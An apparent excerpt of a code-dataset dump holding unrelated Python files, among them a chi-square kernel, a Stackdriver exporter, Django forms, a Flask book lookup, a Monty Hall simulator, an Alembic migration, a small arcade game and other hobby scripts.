evaluations.\n\n\t\t\"\"\"\n\t\t\n\t\tif not isinstance(new_data, np.ndarray):\n\t\t\tnew_data = np.array(new_data)\n\t\t\n\t\tif len(new_data.shape) == 1:\n\t\t\tnew_data = new_data.reshape(-1, 1)\n\t\t\t\n\t\tn, d1 = new_data.shape\n\t\t\n\t\tcheck_data_compatibility(self.data, new_data)\n\t\t\n\t\toutput = np.zeros((self.N, n), dtype=np.float64)\n\t\t\n\t\tfor i in range(self.N):\n\t\t\tfor j in range(n):\n\t\t\t\ts = 0\n\t\t\t\tfor k in range(self.d):\n\t\t\t\t\ts += 2. * self.data[i][k] * new_data[j][k] / (self.data[i][k] + new_data[j][k])\n\t\t\t\t\n\t\t\t\toutput[i][j] = s\n\t\t\t\t\n\t\treturn output\n\n\nif __name__ == '__main__':\n\t\n\tdata1 = np.random.randn(500 * 3).reshape(500, 3)\n\tnew_data1 = np.random.randn(1000 * 3).reshape(1000, 3)\n\tkernel = ChiSquare(data1)\n\tk1 = kernel.kernel_matrix(new_data1)\n\tk2 = kernel.kernel_single_eval(new_data1)\n\tprint(np.allclose(k1, k2))\n\t\n\tdata2 = np.random.randn(500)\n\tnew_data2 = np.random.randn(1000)\n\tkernel = ChiSquare(data2)\n\tk3 = kernel.kernel_matrix(new_data2)\n\tk4 = kernel.kernel_single_eval(new_data2)\n\tprint(np.allclose(k3, k4))\n","sub_path":"chisq.py","file_name":"chisq.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"26442930","text":"import win32gui\r\nPIXEL_SIZE = 16 # ,每个格子像素大小\r\nHIGH_LEVEL = 3 # 三个等级\r\nMIDDLE_LEVEL = 2\r\nPRIMARY_LEVEL = 1\r\n\r\n\r\ndef get_rim(hwnd):\r\n # 获得出去边框之外的界面的长宽位置\r\n left, top, right, bottom = win32gui.GetWindowRect(hwnd) # 窗口大小\r\n left = left + 15\r\n right = right - 11\r\n bottom = bottom - 11\r\n top = bottom - PIXEL_SIZE * get_window_height_and_length(hwnd)[0]\r\n assert (right - left) / PIXEL_SIZE == get_window_height_and_length(hwnd)[1] # 长度length\r\n assert (bottom - top) / PIXEL_SIZE == get_window_height_and_length(hwnd)[0] # 高度height\r\n return left, top, right, bottom\r\n\r\n\r\ndef get_ranking_level(hwnd):\r\n # 根据长宽尺寸判断高级,中级,低级\r\n left, top, right, bottom = win32gui.GetWindowRect(hwnd) # 窗口大小\r\n left = left + 15\r\n right = right - 11\r\n length = (right - left) / PIXEL_SIZE\r\n if length == 30:\r\n return HIGH_LEVEL # 高级\r\n elif length == 16:\r\n return MIDDLE_LEVEL\r\n elif length == 9:\r\n return PRIMARY_LEVEL\r\n else:\r\n print(\"根据尺寸计算扫雷等级错误\")\r\n\r\n\r\ndef get_window_height_and_length(hwnd):\r\n # 根据等级返回长宽格子数目\r\n ranking_level = get_ranking_level(hwnd)\r\n if ranking_level == HIGH_LEVEL:\r\n return 16, 30\r\n elif ranking_level == MIDDLE_LEVEL:\r\n return 16, 16\r\n else:\r\n return 9, 9\r\n\r\n\r\ndef get_max_mines(hwnd):\r\n # 根据等级得到雷数目\r\n ranking_level = get_ranking_level(hwnd)\r\n if ranking_level == HIGH_LEVEL:\r\n return 99\r\n elif ranking_level == MIDDLE_LEVEL:\r\n return 40\r\n else:\r\n return 10\r\n","sub_path":"get_window.py","file_name":"get_window.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"365485443","text":"# Copyright 2019 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\n`stackdriver.py`\nStackdriver Monitoring exporter class.\n\"\"\"\nimport logging\nimport google.api_core.exceptions\nfrom google.cloud import monitoring_v3\n\nLOGGER = logging.getLogger(__name__)\nDEFAULT_METRIC_TYPE = \"custom.googleapis.com/error_budget_burn_rate\"\nDEFAULT_METRIC_DESCRIPTION = (\"Speed at which the error budget for a given\"\n \"aggregation window is consumed\")\n\n\nclass StackdriverExporter:\n \"\"\"Stackdriver Monitoring exporter class.\"\"\"\n\n def __init__(self):\n self.client = monitoring_v3.MetricServiceClient()\n\n def export(self, data, **config):\n \"\"\"Export data to Stackdriver Monitoring.\n\n Args:\n data (dict): Data to send to Stackdriver Monitoring.\n config (dict): Stackdriver Monitoring metric config.\n project_id (str): Stackdriver host project id.\n custom_metric_type (str): Custom metric type.\n custom_metric_unit (str): Custom metric unit.\n\n Returns:\n object: Stackdriver Monitoring API result.\n \"\"\"\n if not self.get_metric_descriptor(**config):\n self.create_metric_descriptor(**config)\n self.create_timeseries(data, **config)\n\n def create_timeseries(self, data, **config):\n \"\"\"Create Stackdriver Monitoring timeseries.\n\n Args:\n data (dict): Data to send to Stackdriver Monitoring.\n config (dict): Metric config.\n\n Returns:\n object: Metric descriptor.\n \"\"\"\n series = monitoring_v3.types.TimeSeries()\n series.metric.type = config.get('metric_type', DEFAULT_METRIC_TYPE)\n\n # Write timeseries metric labels.\n series.metric.labels['error_budget_policy_step_name'] = str(\n data['error_budget_policy_step_name'])\n series.metric.labels['window'] = str(data['window'])\n series.metric.labels['service_name'] = data['service_name']\n series.metric.labels['feature_name'] = data['feature_name']\n series.metric.labels['slo_name'] = data['slo_name']\n series.metric.labels['alerting_burn_rate_threshold'] = str(\n data['alerting_burn_rate_threshold'])\n\n # Use the generic resource 'global'.\n series.resource.type = 'global'\n series.resource.labels['project_id'] = config['project_id']\n\n # Create a new data point.\n point = series.points.add()\n\n # Define end point timestamp.\n timestamp = data['timestamp']\n point.interval.end_time.seconds = int(timestamp)\n point.interval.end_time.nanos = int(\n (timestamp - point.interval.end_time.seconds) * 10**9)\n\n # Set the metric value.\n point.value.double_value = data['error_budget_burn_rate']\n\n # Record the timeseries to Stackdriver Monitoring.\n project = self.client.project_path(config['project_id'])\n result = self.client.create_time_series(project, [series])\n labels = series.metric.labels\n LOGGER.debug(\n f\"timestamp: {timestamp} burnrate: {point.value.double_value}\"\n f\"{labels['service_name']}-{labels['feature_name']}-\"\n f\"{labels['slo_name']}-{labels['error_budget_policy_step_name']}\")\n return result\n\n def get_metric_descriptor(self, **config):\n \"\"\"Get Stackdriver Monitoring metric descriptor.\n\n Args:\n config (dict): Metric config.\n\n Returns:\n object: Metric descriptor (or None if not found).\n \"\"\"\n name = config.get('metric_type', DEFAULT_METRIC_TYPE)\n descriptor = self.client.metric_descriptor_path(config['project_id'],\n name)\n try:\n return self.client.get_metric_descriptor(descriptor)\n except google.api_core.exceptions.NotFound:\n return None\n\n def create_metric_descriptor(self, **config):\n \"\"\"Create Stackdriver Monitoring metric descriptor.\n\n Args:\n config (dict): Metric config.\n\n Returns:\n object: Metric descriptor.\n \"\"\"\n project = self.client.project_path(config['project_id'])\n descriptor = monitoring_v3.types.MetricDescriptor()\n descriptor.type = config.get('metric_type', DEFAULT_METRIC_TYPE)\n descriptor.metric_kind = (\n monitoring_v3.enums.MetricDescriptor.MetricKind.GAUGE)\n descriptor.value_type = (\n monitoring_v3.enums.MetricDescriptor.ValueType.DOUBLE)\n descriptor.description = config.get('metric_description',\n DEFAULT_METRIC_DESCRIPTION)\n self.client.create_metric_descriptor(project, descriptor)\n return descriptor\n","sub_path":"tools/slo-generator/slo_generator/exporters/stackdriver.py","file_name":"stackdriver.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"232145473","text":"\"\"\"\n forms for event application\n\"\"\"\nfrom django import forms\nfrom django.contrib.auth.models import User\n\nfrom project_management.notifications.models import Event\n\nDATE_INPUT_FORMAT = '%m-%d-%Y'\nDATE_FIELD_ATTR = {'class': 'vDateField'}\n\n\nclass EventForm(forms.ModelForm):\n\n date = forms.DateField(\n input_formats=[DATE_INPUT_FORMAT],\n required=False,\n widget=forms.TextInput(\n attrs=DATE_FIELD_ATTR))\n\n def save(self, user, commit=True):\n \"\"\"\n Overriden save method to include creator and attendees in event\n \"\"\"\n event = super(EventForm, self).save(commit=False)\n event.creator = user\n if commit:\n event.save()\n for user in self.cleaned_data['attendees']:\n event.attendees.add(user)\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Overriden init method to filter only active users\n \"\"\"\n super(self.__class__, self).__init__(*args, **kwargs)\n self.fields['attendees'].queryset = User.objects.filter(\n is_active=True, is_staff=False).order_by('username')\n\n class Meta:\n model = Event\n fields = ('name', 'date', 'start_time', 'end_time', 'venue',\n 'location', 'project', 'type', 'attendees', 'description')\n","sub_path":"project_management/notifications/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"601650469","text":"from flask import Flask, render_template, abort\nfrom xml import etree\napp = Flask (__name__)\n\n@app.route('/')\ndef inicio():\n return render_template(\"inicio.html\")\n\n@app.route('/potencia//')\ndef potencia(base,exponente):\n try:\n base=int(base)\n exponente=int(exponente)\n except:\n abort(404)\n if exponente > 0:\n resultado = base**exponente\n elif exponente == 0:\n resultado = 1\n elif exponente < 0:\n resultado = 1/(base**abs(exponente))\n return render_template(\"potencia.html\",ba=base,ex=exponente,res=resultado)\n\n@app.route('/cuenta//')\ndef contar(cad1,cad2):\n if len(cad2) == 1:\n aparece = cad1.count(cad2)\n else:\n abort(404)\n return render_template(\"contar.html\",palabra=cad1,letra=cad2,apariciones=aparece)\n\n@app.route('/libro/')\ndef buscar(codigo):\n doc = etree.parse('libros.xml')\n if str(codigo) in doc.xpath(\"/biblioteca/libro/codigo/text()\"):\n titulo=doc.xpath(\"/biblioteca/libro[codigo/text()='%s']/titulo/text()\"%codigo)[0]\n autor=doc.xpath(\"/biblioteca/libro[codigo/text()='%s']/autor/text()\"%codigo)[0]\n else:\n abort(404)\n return render_template(\"buscar.html\",titulo=titulo,autor=autor)\n\napp.run(debug=True)\n","sub_path":"proyectoflask.py","file_name":"proyectoflask.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"322436534","text":"# Isaac Yep\n# Monty Hall simulator\n\nimport random\n\ntrial_iterations = int(input(\"How many trials would you like to simulate? (positive number) \"))\n\n\n# Dont swap doors\nno_swap_win, no_swap_tot = 0, 0\n\nfor i in range(1,trial_iterations):\n\tno_swap_target, no_swap_guess = random.randint(1,3), random.randint(1,3)\n\tif no_swap_target == no_swap_guess:\n\t\tno_swap_win += 1\n\tno_swap_tot += 1\n\nno_swap_prob = no_swap_win/no_swap_tot\n\n\n# Swap doors\nswap_win, swap_tot = 0, 0\n\nfor i in range(1,trial_iterations):\n\tswap_target, first_guess = random.randint(1,3), random.randint(1,3)\n\tif first_guess != swap_target:\n\t\tswap_win += 1\n\tswap_tot += 1\n\nswap_prob = swap_win/swap_tot\n\n\n# Print results\nprint(\"Trials simulated: \t {}\".format(trial_iterations))\nprint(\"Probability of swapping: {}%\".format(swap_prob*100))\nprint(\"Probability of not swapping: {}%\".format(no_swap_prob*100))\n","sub_path":"Main_Arch/in_class_CS199_1/montyHall.py","file_name":"montyHall.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"79333683","text":"class acmp4(object):\n def game():\n while True:\n usernum = int(input(\"enter number \\n\"))\n if usernum < 10 and usernum > 0:\n break\n print(\"Wrong Number\")\n\n result = 9 - usernum\n print((usernum * 100) + 90 + result)","sub_path":"PythonLearning/acmp4.py","file_name":"acmp4.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"346428009","text":"# Copyright (C) 2016 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"\nMigrate audits for snapshots\n\nCreate Date: 2016-11-17 11:49:04.547216\n\"\"\"\n# disable Invalid constant name pylint warning for mandatory Alembic variables.\n# pylint: disable=invalid-name\n\nfrom logging import getLogger\n\nfrom alembic import op\n\nfrom sqlalchemy.sql import column\nfrom sqlalchemy.sql import select\nfrom sqlalchemy.sql import table\nfrom sqlalchemy.sql import tuple_\n\nfrom ggrc.models.event import Event\nfrom ggrc.models.revision import Revision\nfrom ggrc.models.snapshot import Snapshot\nfrom ggrc.models.assessment import Assessment\nfrom ggrc.models.issue import Issue\n\nfrom ggrc.migrations.utils import get_relationship_cache\nfrom ggrc.migrations.utils import get_revisions\nfrom ggrc.migrations.utils import insert_payloads\nfrom ggrc.migrations.utils import Stub\nfrom ggrc.migrations.utils.validation import (\n validate_assessment_issue_to_audit_relationships)\n\nfrom ggrc.migrations.utils.migrator import get_migration_user_id\n\nfrom ggrc.snapshotter.rules import Types\n\n\nlogger = getLogger(__name__) # pylint: disable=invalid-name\n\n\n# revision identifiers, used by Alembic.\nrevision = '142272c4a0b6'\ndown_revision = '579239d161e1'\n\nevents_table = Event.__table__\nsnapshots_table = Snapshot.__table__\nrevisions_table = Revision.__table__\n\nassessments_table = Assessment.__table__\nissues_table = Issue.__table__\n\naudits_table = table(\n \"audits\",\n column(\"id\"),\n column(\"context_id\"),\n column(\"program_id\"),\n)\n\nprograms_table = table(\n \"programs\",\n column(\"id\"),\n column(\"context_id\")\n)\n\n\ndef create_snapshots(connection, user_id, caches, audits):\n \"\"\"Create snapshots and relationships to programs\"\"\"\n # pylint: disable=too-many-locals\n relationships_payload = []\n snapshots_payload = []\n snapshot_quads = set()\n\n program_relationships = caches[\"program_rels\"]\n audit_relationships = caches[\"audit_rels\"]\n program_contexts = caches[\"program_contexts\"]\n revisions_cache = caches[\"revisions\"]\n\n for audit in audits:\n parent_key = Stub(\"Audit\", audit.id)\n program_key = Stub(\"Program\", audit.program_id)\n audit_scope_objects = audit_relationships[parent_key]\n program_scope_objects = program_relationships[program_key]\n missing_in_program_scope = audit_scope_objects - program_scope_objects\n\n if missing_in_program_scope:\n for obj_ in missing_in_program_scope:\n if obj_ in revisions_cache:\n relationships_payload += [{\n \"source_type\": \"Program\",\n \"source_id\": audit.program_id,\n \"destination_type\": obj_.type,\n \"destination_id\": obj_.id,\n \"modified_by_id\": user_id,\n \"context_id\": program_contexts[audit.program_id],\n }]\n\n if audit_scope_objects:\n for obj_ in audit_scope_objects:\n if obj_ in revisions_cache:\n quad = (\"Audit\", audit.id, obj_.type, obj_.id)\n snapshot_quads.add(quad)\n snapshots_payload += [{\n \"parent_type\": \"Audit\",\n \"parent_id\": audit.id,\n \"child_type\": obj_.type,\n \"child_id\": obj_.id,\n \"revision_id\": revisions_cache[obj_],\n \"context_id\": audit.context_id,\n \"modified_by_id\": user_id,\n }]\n # this is because of our hack where we rely on relationships\n # to actually show objects\n relationships_payload += [{\n \"source_type\": \"Audit\",\n \"source_id\": audit.id,\n \"destination_type\": obj_.type,\n \"destination_id\": obj_.id,\n \"modified_by_id\": user_id,\n \"context_id\": audit.context_id,\n }]\n else:\n logger.warning(\n \"Missing revision for object %s-%s\", obj_.type, obj_.id)\n\n insert_payloads(connection, snapshots_payload, relationships_payload)\n return snapshot_quads\n\n\ndef process_audits(connection, user_id, caches, audits):\n \"\"\"Process audits\"\"\"\n snapshot_quads = create_snapshots(connection, user_id, caches, audits)\n\n relationships_payload = []\n if snapshot_quads:\n snapshots = connection.execute(select([snapshots_table]).where(\n tuple_(\n Snapshot.parent_type,\n Snapshot.parent_id,\n Snapshot.child_type,\n Snapshot.child_id,\n ).in_(snapshot_quads)\n )).fetchall()\n snapshot_cache = {\n (obj_.parent_type, obj_.parent_id,\n obj_.child_type, obj_.child_id): (obj_.id, obj_.context_id)\n for obj_ in snapshots\n }\n for snapshot in snapshot_quads:\n relationships_payload += [{\n \"source_type\": snapshot[2],\n \"source_id\": snapshot[3],\n \"destination_type\": \"Snapshot\",\n \"destination_id\": snapshot_cache[snapshot][0],\n \"modified_by_id\": user_id,\n \"context_id\": snapshot_cache[snapshot][1],\n }]\n\n insert_payloads(connection, relationships=relationships_payload)\n\n\ndef upgrade():\n \"\"\"Migrate audit-related data and concepts to audit snapshots\"\"\"\n # pylint: disable=too-many-locals\n\n connection = op.get_bind()\n\n audits_more, ghost_objects = (\n validate_assessment_issue_to_audit_relationships(connection))\n\n if audits_more or ghost_objects:\n if audits_more:\n for klass_name, ids in audits_more.items():\n logger.warning(\n \"The following %s have more than one Audit: %s\",\n klass_name,\n \",\".join(map(str, ids)) # pylint: disable=bad-builtin\n )\n if ghost_objects:\n for klass_name, ids in ghost_objects.items():\n logger.warning(\n \"The following %s have no Audits mapped to them: %s\",\n klass_name,\n \",\".join(map(str, ids)) # pylint: disable=bad-builtin\n )\n raise Exception(\"Cannot perform migration. Check logger warnings.\")\n\n audits = connection.execute(audits_table.select()).fetchall()\n if audits:\n program_ids = {audit.program_id for audit in audits}\n\n program_sql = select([programs_table]).where(\n programs_table.c.id.in_(program_ids)\n )\n programs = connection.execute(program_sql)\n program_contexts = {program.id: program.context_id for program in programs}\n\n program_relationships = get_relationship_cache(\n connection, \"Program\", Types.all)\n audit_relationships = get_relationship_cache(\n connection, \"Audit\", Types.all)\n\n all_objects = (program_relationships.values() +\n audit_relationships.values())\n revisionable_objects = set()\n revisionable_objects = revisionable_objects.union(*all_objects)\n revision_cache = get_revisions(connection, revisionable_objects)\n\n objects_missing_revision = (revisionable_objects -\n set(revision_cache.keys()))\n if objects_missing_revision:\n missing = \",\".join(\n [\"{obj.type}-{obj.id}\".format(obj=obj)\n for obj in objects_missing_revision])\n logger.warning(\n \"Phantom objects mapped to program or audit: %s\", missing)\n\n caches = {\n \"program_contexts\": program_contexts,\n \"program_rels\": program_relationships,\n \"audit_rels\": audit_relationships,\n \"revisions\": revision_cache\n }\n\n user_id = get_migration_user_id(connection)\n\n process_audits(connection, user_id, caches, audits)\n\n\ndef downgrade():\n pass\n","sub_path":"src/ggrc/migrations/versions/20161117114904_142272c4a0b6_migrate_audits_for_snapshots.py","file_name":"20161117114904_142272c4a0b6_migrate_audits_for_snapshots.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"595407911","text":"import arcade\n\nWINDOW_WIDTH = 500\nWINDOW_HEIGHT = 500\nBACKGROUND_COLOR = arcade.color.ANTIQUE_WHITE\nGAME_TITLE = \"Ada or Potato?\"\n\nTIMER_MAXIMUM = 6\n\nIMAGE_ADA = arcade.load_texture(\"images/ada.png\")\nIMAGE_POTATO = arcade.load_texture(\"images/potato.png\", scale=.21)\n\n\nclass Ada(arcade.Sprite):\n timer: int\n\n def __init__(self):\n super().__init__()\n self.timer = 0\n self.center_x = WINDOW_WIDTH/2\n self.center_y = WINDOW_HEIGHT/2\n self.texture = IMAGE_ADA\n\n def update_timer(self):\n if self.timer < TIMER_MAXIMUM:\n self.timer += 1\n else:\n self.timer = 0\n self.switch_image()\n\n def update(self):\n self.update_timer()\n\n def switch_image(self):\n if self.texture == IMAGE_ADA:\n self.texture = IMAGE_POTATO\n else:\n self.texture = IMAGE_ADA\n\n\nclass AdaGame(arcade.Window):\n\n def __init__(self):\n super().__init__(WINDOW_WIDTH, WINDOW_HEIGHT, GAME_TITLE)\n self.points = 0\n self.status = Ada()\n\n def setup(self):\n arcade.set_background_color(BACKGROUND_COLOR)\n\n def on_draw(self):\n \"\"\" Called when it is time to draw the world \"\"\"\n arcade.start_render()\n self.status.draw()\n output = f\"Score: {self.points}\"\n arcade.draw_rectangle_outline(35, 55, 60.0, 45.0, arcade.color.BLACK)\n arcade.draw_text(output, 10, 50, arcade.color.BLACK, 13)\n\n def on_update(self, delta_time):\n self.status.update()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n if self.status.texture == IMAGE_ADA:\n self.points += 1\n else:\n self.points -= 1\n\ndef main():\n window = AdaGame()\n window.setup()\n arcade.run()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"game1_ada_or_potato.py","file_name":"game1_ada_or_potato.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"116285330","text":"from gensim.models import KeyedVectors\nimport sys\n\ndef addsub(word1, word2, word3):\n wv = KeyedVectors.load_word2vec_format('./wiki.vec.pt', binary=True)\n new_vec = wv[word1] - wv[word2] + wv[word3]\n results = wv.most_similar(positive=[new_vec])\n for result in results:\n print(result)\n\nif __name__ == \"__main__\":\n args = sys.argv\n word1 = str(args[1])\n word2 = str(args[2])\n word3 = str(args[3])\n\n addsub(word1, word2, word3)\n","sub_path":"word2vec/addsub3.py","file_name":"addsub3.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"466025855","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# #\n# Author Alan David Martínez. Copyright Alan David Martínez - #\n# alan.david507@gmail.com #\n# This program is free software: you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation, either version 3 of the License, or #\n# (at your option) any later version. #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# GNU General Public License for more details. #\n# #\n# You should have received a copy of the GNU General Public License #\n# along with this program. If not, see . #\n# #\n##############################################################################\n\nfrom openerp import models, fields, api\n\n\nclass account_invoice(models.Model):\n _inherit = 'account.invoice'\n\n @api.multi\n def set_number(self):\n return {\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'account.invoice.next_number',\n 'target': 'new',\n 'type': 'ir.actions.act_window',\n 'context': {'invoice_id': self.id}\n }\n\n\nclass next_number(models.TransientModel):\n _name = 'account.invoice.next_number'\n\n @api.model\n def get_number(self):\n invoice_id = self.env.context.get('invoice_id')\n invoice_obj = self.pool['account.invoice']\n sequence_obj = self.pool['ir.sequence']\n invoice = invoice_obj.browse(self.env.cr, self.env.uid, invoice_id)\n taller_seq = sequence_obj.browse(self.env.cr, self.env.uid, 15)\n return taller_seq.number_next\n\n @api.multi\n def do_action(self):\n sequence_obj = self.pool['ir.sequence']\n invoice_id = self.env.context.get('invoice_id')\n invoice_obj = self.pool['account.invoice']\n invoice = invoice_obj.browse(self.env.cr, self.env.uid, invoice_id)\n taller_seq = sequence_obj.browse(self.env.cr, self.env.uid, 15)\n taller_seq.sudo().write({'number_next': self.next_number})\n\n # COLUMNAS\n next_number = fields.Integer('Next Number')\n actual_number = fields.Integer('Actual Number', default=get_number)\n","sub_path":"chiex/account_invoice.py","file_name":"account_invoice.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"557572910","text":"# From facebook codelab \n# Given N and M find all stepping numbers in range N to M\n# A number is called as a stepping number if the adjacent digits have a difference of 1.\n# e.g 123 is stepping number, but 358 is not a stepping number\n\n#helper function which checks whether specified number's adjacent digits differ by one \n\ndef isStepNum(a):\n\n\tprev = a%10\n\ta = a/10\n\twhile(a > 0):\n\t\tcurrent = a%10\n\t\tif abs(current - prev) != 1:\n\t\t\treturn False\n\t\tprev = current\n\t\ta = a/10\n\treturn True\n\ndef stepnum(A, B):\n\t#data structure to return - contains all valid numbers in range [A,B]\n\tans = []\n\t\n\t#iterate from A - B - not using a for loop to facilitate an optimization, see below\n\ti = A \n\twhile(i <= B):\n\n\t\t#optimization - if all but the most significant digit do not form a valid step number, all 10 numbers iwth those least significant\n\t\t#digits can be skipped == eg 130 - 139 cannot be valid \n\t\tif(i >= 110):\n\t\t\tif not isStepNum(i/10):\n\t\t\t\ti = i + (10 - i%10) #this formula will go to the next group of tens - eg from 203 to 210\n\t\t\n\t\tif isStepNum(i):\n\t\t\tans.append(i)\n\n\t\ti = i + 1\n\treturn ans\n\n\n\n#test - should return 10, 12\nprint(stepnum(10, 20))","sub_path":"python/stepnum.py","file_name":"stepnum.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"384419318","text":"__doc__ = '''Sample size boosting.'''\nfrom PIL import Image, ImageFilter\nimport os\nimport numpy as np\n\n\nsubsampled_size = (128,128)\n\ndef make_subimages(im):\n\tdim = min(im.size) * .9\n\tupper_left = im.crop((0,0,dim,dim))\n\tlower_left = im.crop((0, im.height - dim, dim, im.height))\n\tupper_right = im.crop((im.width - dim, 0, im.width, dim))\n\tlower_right = im.crop((im.width - dim, im.height-dim, im.width, im.height))\n\tmidtop = (im.height - dim) // 2\n\tmidleft = (im.width - dim) // 2\n\tmid = im.crop((midleft, midtop, midleft + dim, midtop + dim))\n\treturn [upper_left, upper_right, lower_left, lower_right, mid]\n\ndef sample_size_boost(values, new_size = subsampled_size):\n# every possible rotation and flip: rotate 90, fliph, flipv\t\n\timage = Image.fromarray(values.astype('uint8'))\n\tlist_0 = make_subimages(image)\n\tlist_1 = []\n\tlist_2 = []\n\tlist_3 = []\n\tlist_4 = []\n\tfor i in list_0: \n\t\tlist_1.append(i.rotate(90))\n\t\tlist_1.append(i)\n\tdel list_0\n\tfor i in list_1: \n\t\tlist_2.append(i.transpose(Image.FLIP_LEFT_RIGHT))\n\t\tlist_2.append(i)\n\tdel list_1\n\tfor i in list_2: \n\t\tlist_3.append(i.transpose(Image.FLIP_TOP_BOTTOM))\t\n\t\tlist_3.append(i)\n\tdel list_2\n\t# downsample images\n\tfor i in list_3: list_4.append(np.array(i.resize(subsampled_size)))\n\treturn list_4\n\t\nif __name__ == \"__main__\":\n\tx = np.arange(1638400).reshape(1280,-1)\n\tprint(len(sample_size_boost(x)))\n","sub_path":"SSB.py","file_name":"SSB.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"591582851","text":"import random\nimport string\nfrom django.contrib.sites.models import Site\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils import timezone\nfrom bearded_comments.models import TComment, TCommentNode\nfrom bearded_comments.forms import TCommentForm\n\n_GTLDS = ['.com', '.net', '.org']\n\ndef random_string(len_=5):\n return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(len_))\n\ndef random_email():\n return ''.join([random_string(), '@', random_string(), random.choice(_GTLDS)])\n\ndef random_url():\n return ''.join([random_string(), random.choice(_GTLDS)])\n\ndef create_tcomment(target=None, **kwargs):\n \"\"\"\n Factory for creating TComment instances.\n :param target: Target model of the comment. Defaults to the current Site.\n :return: A new TComment instance.\n \"\"\"\n site = Site.objects.get_current()\n target_ = target if target else site\n # content_type, object_pk, timestamp, security_hash\n security_data = TCommentForm(target_).generate_security_data()\n # Base django_comments data\n data = {\n 'content_type': ContentType.objects.get_for_model(target_),\n 'object_pk': security_data['object_pk'],\n 'user_name': random_string(),\n 'user_email': random_email(),\n 'user_url': random_url(),\n 'comment': random_string(25),\n 'submit_date': timezone.now(),\n 'site_id': site.pk,\n 'is_public': True,\n 'is_removed': False\n }\n # Extended TComment data\n data.update({\n 'title': random_string()\n })\n # Caller override auto-generated fields\n data.update(kwargs)\n return TComment(**data)\n\ndef create_tcomment_node(comment=None, parent=None):\n \"\"\"\n Factory for creating TCommentNode instances.\n \"\"\"\n pass\n\ndef create_tcomment_tree(target=None, \n max_depth=3, \n max_children=3, \n with_signal=False,\n depth=1, \n parent=None):\n \"\"\"\n Recursively populate the database with a random tree of depth max_depth.\n \"\"\"\n if depth <= max_depth:\n children = random.randrange(1, max_children + 1)\n for _ in range(children):\n c = create_tcomment(target)\n c.save()\n if parent:\n node = parent.node.add_child(comment=c)\n else:\n node = TCommentNode.add_root(comment=c)\n c.node = node\n c.save()\n create_tcomment_tree(target, depth=depth+1, parent=c, with_signal=with_signal)\n\n\n\n\n\n","sub_path":"bearded_comments/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"321122744","text":"a = dict(one=1,two=2,three=3)\nb = {'one':1,'two':2,'three':3}\nc = dict(zip(['one','two','three'],[1,2,3]))\nd = dict([('two',2),('one',1),('three',3)])\ne = dict({'three':3,'one':1,'two':2})\nprint(a==b==c==d==e)\n\nDIAL_CODES = [\n (86,'china'),\n (91,'india'),\n (1,'united states'),\n (62,'indonesia'),\n (55,'brazil'),\n (92,'pakistan'),\n (880,'bangladesh'),\n (234,'nigeria'),\n (7,'russia'),\n (81,'janpan'),\n]\ncountry_code = {country.title(): code for code,country\n in DIAL_CODES\n if code <66}\nprint(country_code)\n\nimport sys,re\n\n\nWORD_RE = re.compile(r'\\w+')\nindex = {}\nwith open(sys.argv[1],encoding='utf-8') as fp:\n print(fp)\n for line_no,line in enumerate(fp,1):\n for match in WORD_RE.finditer(line):\n word = match.group()\n column_no = match.start()+1\n location = (line_no,column_no)\n\n occurrences = index.get(word,[])\n occurrences.append(location)\n index[word] = occurrences\n\n index.setdefault(word,[]).append(location)\n my_dict.setdefault(key,[]).append(new_value)\n\n if key not in my_dict:\n my_dict[key] = []\n 